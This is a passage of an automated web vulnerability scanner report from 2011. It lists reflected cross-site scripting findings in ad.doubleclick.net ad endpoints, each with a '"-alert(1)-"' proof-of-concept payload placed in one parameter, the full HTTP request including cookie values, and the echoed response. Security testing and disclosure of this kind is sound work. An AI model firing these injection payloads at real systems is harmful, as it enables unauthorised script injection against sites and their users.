3B0-0%3B0%3B61697327%3B3454-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301ec23f"-alert(1)-"794881e6562&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t
...[SNIP]...

3.264. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55fa0"-alert(1)-"8d5087bf226 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.24355fa0"-alert(1)-"8d5087bf226&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.24355fa0"-alert(1)-"8d5087bf226&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.hp.com/united-states/tradein/promo/laserjet3/index_ent.html?jumpid=ex_r2612_go/tradeinandsave/dm:_N5823.CNET_61697327_239466418_41
...[SNIP]...

3.265. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1899"-alert(1)-"373caf14283 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8c1899"-alert(1)-"373caf14283&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8c1899"-alert(1)-"373caf14283&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.hp.com/united-states/tradein/p
...[SNIP]...

3.266. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e634d"-alert(1)-"dc172a7f5be was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977e634d"-alert(1)-"dc172a7f5be&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/181/%2a/u%3B239466418%3B0-0%3B0%3B61697327%3B3454-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977e634d"-alert(1)-"dc172a7f5be&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=
...[SNIP]...

3.267. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bfb4"-alert(1)-"6b063d0056b was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=31bfb4"-alert(1)-"6b063d0056b&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
9466418%3B0-0%3B0%3B61697327%3B3454-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=31bfb4"-alert(1)-"6b063d0056b&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5Nt
...[SNIP]...

3.268. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5021a"-alert(1)-"730b02f3fc2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=193805021a"-alert(1)-"730b02f3fc2&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:15:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...

var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/181/%2a/u%3B239466418%3B0-0%3B0%3B61697327%3B3454-728/90%3B41243731/41261518/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=193805021a"-alert(1)-"730b02f3fc2&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppart
...[SNIP]...

3.269. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CNET/B5363262.20

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38b06"-alert(1)-"26dad3ac539 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CNET/B5363262.20;sz=728x90;click0=http://adlog.com.com/adlog/e/r=19380&sg=507977&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.4538b06"-alert(1)-"26dad3ac539&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4738

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0057815&pp=100&e=3&rqid=00phx1-ad-e20:4DB897F8B94F8&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.4538b06"-alert(1)-"26dad3ac539&event=58/http://www.hp.com/united-states/tradein/promo/laserjet3/index_ent.html?jumpid=ex_r2612_go/tradeinandsave/dm:_N5823.CNET_61697327_239466418_41243731");
var wmode = "opaque";
var bg = "same as
...[SNIP]...

3.270. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e0fe"-alert(1)-"ff95fe7b18f was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=645e0fe"-alert(1)-"ff95fe7b18f&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=645e0fe"-alert(1)-"ff95fe7b18f&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.
...[SNIP]...

3.271. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cb3e"-alert(1)-"bf402c0c0eb was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=4cb3e"-alert(1)-"bf402c0c0eb&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:42:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=4cb3e"-alert(1)-"bf402c0c0eb&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.face
...[SNIP]...

3.272. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff6c8"-alert(1)-"8a8c3547842 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=ff6c8"-alert(1)-"8a8c3547842&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:44:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6527



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
g=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=ff6c8"-alert(1)-"8a8c3547842&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
va
...[SNIP]...

3.273. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce02e"-alert(1)-"c18d7645fa was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=ce02e"-alert(1)-"c18d7645fa&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:44:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6523



<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=ce02e"-alert(1)-"c18d7645fa&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaqu
...[SNIP]...

3.274. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5865.149883.CBS_SPORTS/B5436755.8

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1267d"-alert(1)-"12cea1025ac was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

